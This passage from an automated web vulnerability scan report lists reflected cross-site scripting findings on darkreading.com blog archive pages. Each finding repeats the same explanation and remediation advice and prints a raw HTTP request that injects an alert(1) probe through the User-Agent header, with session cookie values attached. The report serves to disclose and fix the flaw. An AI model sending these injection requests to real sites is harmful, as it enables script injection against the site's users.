Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2008/04/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a6f7c"-alert(1)-"02550c4ddae
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1918a"-alert(1)-"5de19797bcf was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/01/how_hackers_wil.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1918a"-alert(1)-"5de19797bcf
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d501"-alert(1)-"6d719a73b74 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/01/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1d501"-alert(1)-"6d719a73b74
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f1dc"-alert(1)-"8e761ac2a9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/02/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6f1dc"-alert(1)-"8e761ac2a9
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 992e8"-alert(1)-"661c413c2a1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/02/phpbb_password.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)992e8"-alert(1)-"661c413c2a1
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b581c"-alert(1)-"ba44a797c48 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/03/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b581c"-alert(1)-"ba44a797c48
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c686"-alert(1)-"69eea38f63b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/04/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3c686"-alert(1)-"69eea38f63b
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef34f"-alert(1)-"4e809f24566 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/05/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ef34f"-alert(1)-"4e809f24566
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca564"-alert(1)-"444a34afef1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/06/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ca564"-alert(1)-"444a34afef1
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ba0c"-alert(1)-"7947b576908 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/07/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8ba0c"-alert(1)-"7947b576908
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcbec"-alert(1)-"7f757b03da7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/08/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)dcbec"-alert(1)-"7f757b03da7
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d336e"-alert(1)-"f79a23192d2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/09/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d336e"-alert(1)-"f79a23192d2
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6234"-alert(1)-"7e048de364d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/10/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c6234"-alert(1)-"7e048de364d
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92468"-alert(1)-"66b3ff3bc26 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/11/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)92468"-alert(1)-"66b3ff3bc26
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57276"-alert(1)-"f26e3213283 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/12/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)57276"-alert(1)-"f26e3213283
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3133"-alert(1)-"c617777e0de was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/01/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b3133"-alert(1)-"c617777e0de
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b07c7"-alert(1)-"cf1435d5d5e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/02/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b07c7"-alert(1)-"cf1435d5d5e
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86e07"-alert(1)-"e37f836bc3d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/03/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)86e07"-alert(1)-"e37f836bc3d
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab11e"-alert(1)-"effa8005299 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/04/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ab11e"-alert(1)-"effa8005299
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10d18"-alert(1)-"106db11963f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/05/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)10d18"-alert(1)-"106db11963f
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5075d"-alert(1)-"173f9be2d83 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/06/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5075d"-alert(1)-"173f9be2d83
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa020"-alert(1)-"3c860a1776e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/07/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aa020"-alert(1)-"3c860a1776e
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e434"-alert(1)-"67320eb9904 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/08/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7e434"-alert(1)-"67320eb9904
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62549"-alert(1)-"3d057cd3836 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/09/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)62549"-alert(1)-"3d057cd3836
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f85f9"-alert(1)-"248462b7f4c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/10/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f85f9"-alert(1)-"248462b7f4c
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cf0f"-alert(1)-"739b215f8fc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/11/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1cf0f"-alert(1)-"739b215f8fc
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59fe9"-alert(1)-"fb99c24516a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2010/12/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)59fe9"-alert(1)-"fb99c24516a
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
